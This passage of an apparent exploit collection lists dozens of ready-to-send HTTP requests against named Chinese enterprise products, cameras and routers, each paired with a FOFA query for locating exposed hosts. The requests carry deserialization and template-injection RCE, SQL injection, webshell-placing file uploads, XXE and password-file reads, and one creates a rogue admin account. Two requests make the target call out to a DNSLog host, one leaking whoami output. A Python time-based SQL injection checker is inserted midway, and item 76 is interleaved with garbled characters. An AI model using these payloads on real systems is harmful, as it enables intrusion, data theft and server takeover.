/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following interface:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
The sql parameter is base64-encoded SQL that the endpoint executes directly; the value below decodes to select 1,user(),3.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Entsoft (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the injected command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
Blind, time-based: when injectable, the response is delayed by the 5 seconds of the stacked WAITFOR DELAY.
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) Lianaiyun (脸爱云) all-in-one face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
An HTTP 200 response means the account test123456 / 123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the hex output of the injected HashBytes('MD5','102103122') call), the injection is confirmed.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to (relative to the servlet, so ../ works), and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
Blind, time-based (5 second WAITFOR DELAY). The ;.js appended to the .jsp path is a servlet path parameter, which the container strips before mapping the request to the JSP.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
Blind, time-based (5 second WAITFOR DELAY), same ;.js path-parameter trick as item 68.
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
The SID header carries the command to run, base64-encoded: the value below decodes to type C:\Windows\win.ini.
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
Blind, time-based (5 second WAITFOR DELAY) in the accId parameter of the login page, so no credentials are needed.
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

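Items 64, 68, 69 and 71 are all blind, time-based MSSQL injections: the only signal is that WAITFOR DELAY '0:0:5' makes the response about five seconds slower, while the union-based items (66, 89) can be confirmed by a plain substring search for the expected value. A single slow response is weak evidence (network jitter, a busy backend), so a defender re-checking a host after patching should measure a baseline and repeat the comparison. The following is an added example written for this page, not code from the article or from the affected vendors: it builds the benign/delayed pair the way those four requests do, times each several times, and only reports an injection when every delayed request beats the slowest baseline request by most of the injected delay. The URL and parameter name in urllib_sender are placeholders, and simulated_target is a constructed stand-in so the block runs offline.

```python
from __future__ import annotations

import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

Sender = Callable[[str], None]


def mssql_delay_payloads(original: str, seconds: float = 5) -> tuple[str, str]:
    """Return (benign, delayed) values for one parameter. The delayed value closes the
    string literal, stacks a WAITFOR DELAY and comments out the rest, as items 64, 69, 71 do."""
    return original, f"{original}';WAITFOR DELAY '0:0:{seconds:g}'--"


def timed(send: Sender, value: str, trials: int) -> list[float]:
    """Call send(value) `trials` times and return the elapsed seconds of each call."""
    samples = []
    for _ in range(trials):
        start = time.perf_counter()
        send(value)
        samples.append(time.perf_counter() - start)
    return samples


def time_based_sqli_confirmed(send: Sender, benign: str, delayed: str,
                              delay: float, trials: int = 3) -> bool:
    """True only if *every* delayed request is slower than the *slowest* baseline request
    by at least 80% of the injected delay. Comparing min(injected) with max(baseline)
    means one jittery baseline sample cannot produce a false positive, and one fast
    injected sample (which a real WAITFOR cannot produce) is enough to reject."""
    baseline = timed(send, benign, trials)
    injected = timed(send, delayed, trials)
    return min(injected) - max(baseline) >= 0.8 * delay


def urllib_sender(base_url: str, param: str, timeout: float) -> Sender:
    """Build a sender that issues GET base_url?param=<value> with the standard library.
    The response body is irrelevant, only elapsed time is measured, so errors are ignored.
    `timeout` must exceed the injected delay, otherwise the timeout becomes the measurement."""
    def send(value: str) -> None:
        url = f"{base_url}?{urllib.parse.urlencode({param: value})}"
        try:
            with urllib.request.urlopen(url, timeout=timeout) as response:
                response.read()
        except OSError:  # URLError, HTTPError and socket timeouts all derive from OSError
            pass
    return send


def simulated_target(vulnerable: bool, delay: float) -> Sender:
    """Constructed stand-in for a server: about 10 ms per request, plus `delay` when the
    value contains WAITFOR DELAY and the simulated backend is injectable."""
    def send(value: str) -> None:
        extra = delay if vulnerable and "WAITFOR DELAY" in value.upper() else 0.0
        time.sleep(0.01 + extra)
    return send


if __name__ == "__main__":
    DELAY = 0.5  # seconds; the listing uses 5 s against real targets
    benign, delayed = mssql_delay_payloads("1", DELAY)
    # Against a real host (hypothetical URL and parameter; only with authorisation):
    # send = urllib_sender("http://x.x.x.x/Global/Global_UserLogin.aspx", "accId", timeout=4 * DELAY)
    send = simulated_target(vulnerable=True, delay=DELAY)
    print("injectable:", time_based_sqli_confirmed(send, benign, delayed, DELAY))
```

Three trials at 5 seconds cost about 15 seconds per parameter on a vulnerable host and nothing extra on a patched one, which is cheap compared with the cost of a false positive in a ticket queue. For the SOAP request of item 64 the same function applies; only the sender changes (POST with the envelope, the sId value substituted).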
72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
The xmlValue parameter is URL-encoded XML that declares an external entity xxe pointing at file:///c:/windows/win.ini and references it inside the VALUE field.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
The time parameter is passed to a shell unquoted, so the backtick expression runs and its output is redirected into a file under cgi-bin.
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the command output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台service.action远程命令执行7 X3 S( G# ]2 R' Y; O2 A' V
FOFA:title="掌上校园服务管理平台"- y' O! K- p! Z
POST /service_transport/service.action HTTP/1.1* Y4 P* D, b* q
Host: x.x.x.x
( ~5 g. I& A5 g. [  M$ HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 J" s8 W$ S3 I  b
Connection: close
2 [& V8 S5 ~) z: fContent-Length: 211
; X% V* ~2 {# q/ @9 Q: f& dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 _/ x' y' n$ u9 u; A2 v/ b6 l
Accept-Encoding: gzip, deflate5 a7 ^0 j2 O, F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 ~- X, N1 j! n9 [! d9 U3 @" N* |
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
8 F' y; o7 u" t; H( qUpgrade-Insecure-Requests: 13 X3 `. v/ J  _) m

4 C. q3 a) D! O{
+ e* P* n0 Y9 Y"command": "GetFZinfo",
/ L. M" V4 w( _, f: e7 y* I  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"0 v  ~0 U) ~1 A: C% |2 E4 m% W/ {
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"1 z, Z3 S7 _6 `8 K' E, d
}
0 t/ _' S6 o! f- {' Q5 `, J, M% z( b

# V7 `# l' s( G  v! `% ^$ ^GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
4 A7 ^, u; P" V$ O+ A! {( HHost: x.x.x.x. y* a5 r& w2 G/ {

5 |& ^+ I' o: f# _- b$ W) K
/ V- s3 r2 \! i  g! {7 j( p% p% [9 s) F/ ?( z2 D
77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then request the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) bandwidth-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao (天耀) software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
The report parameter is used as the output file name, so ../ places the JSP in the web root.
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 32
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request the written file:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE O&M security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
The sql field is rendered as a FreeMarker template before execution, so the same Execute-class expression as item 76 runs a command; here it makes the server resolve a DNSLog hostname with the output of whoami in it.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The accountId parameter is used as a path, so the traversal writes the (elided) payload under tomcat/webapps; the payload shown in the original drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL after exploitation: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
The host parameter reaches a shell; %0a (newline) ends the ping command and ${IFS} stands in for the space that the filter strips.
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) Mingyu (明御) security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
The suffix parameter is appended to the stored file name without normalisation, so /../../../ moves the file to the web root with a .php extension.
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The uploaded file is then reachable at /jfhatuwe.php

88. DBAppSecurity Mingyu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
The type parameter decodes to a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php, so the injected line writes a PHP file into the web UI directory.
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The written file is then reachable at /txzfsrur.php (the file name used in the request).

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
The path ends in .js%70, i.e. .jsp with the p percent-encoded. The injected 111*222 evaluates to 24642; that value in the response confirms the injection.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
The jsondata[ip] value is executed as a command; note that, unlike the other command injections in this list, no shell metacharacter is needed.
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
